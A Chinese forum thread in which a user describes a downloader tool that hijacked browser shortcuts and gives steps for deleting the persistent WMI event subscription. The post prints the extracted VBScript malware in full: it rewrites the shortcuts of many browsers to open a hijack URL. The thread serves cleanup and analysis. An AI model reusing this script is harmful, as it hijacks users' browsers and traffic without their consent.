献给被XX文库下载软件篡改主页的同学们

songtao6

今天早上在软件更新区下载了一回复量很高（记忆中10页左右，不知道是否准确）的文库下载工具（帖子地址为：https://www.chinapyg.com/thread-85769-1-1.html 已经被BAN了），安装之后发现居然是N久以前的软件，并且浏览器的快捷方式被加上了小尾巴 ，虽然软件已经删除，但是估计主页小尾巴还在，问题不大，却影响着我们美好的心情。下午安装无数杀软/监控软件，均未找到源头，最后通过我们万能的网络和朋友，在23点时候，终于找到了高手们解决这个可恶的小尾巴的方法。至于有没有后门就只有请大婶们费心看下！！！
第一步：进入http://www.microsoft.com/en-us/download/details.aspx?id=24045下载WMITool安装
第二步：开始菜单中找到WMI Tools 运行WMI Event Viewer
第三步：点击register for events
第四步：输入root\CIMV2    点击OK、  OK
第五步：接着在左边右键删除之，当然，想看代码的在右边右键view 如图
打完收工，小尾巴不见了！！！顺便贴下代码

[JavaScript] 纯文本查看 复制代码

On Error Resume Next:Const link = "http://hk.jtsh123.com/?r=b&m=11":Const link360 = "http://hk.jtsh123.com/?r=b&m=11&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\??\Desktop,C:\Users\??\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\??\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\??\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\??\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr = split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:Next:

以上方法来自于一高手，我只是搬运工，据悉这种方式的产品很难杀毒，今天也尝试了好多个杀软，并且在安装时我的杀软居然没有报毒！！！
不知道是否有后门，留待大婶检测

Paqueque

感谢分享，世界因你而精彩、。

jjin999

这样怎么办

chujy

谢谢！！！！！！！！！！！

songtao6

jjin999 发表于 2016-7-29 09:08
这样怎么办

右键管理员身份运行

Juno

就是那个SetHomePage.dll做的好事 提取下安装包删掉它 自己注册下必要文件就行了

jjin999

谢谢，已经搞定了

梁光飞

沙发，，，，，，。。。。。

huaihuai

给楼主赞一个，前来支持。

qq939595

感谢楼主分享经验！！！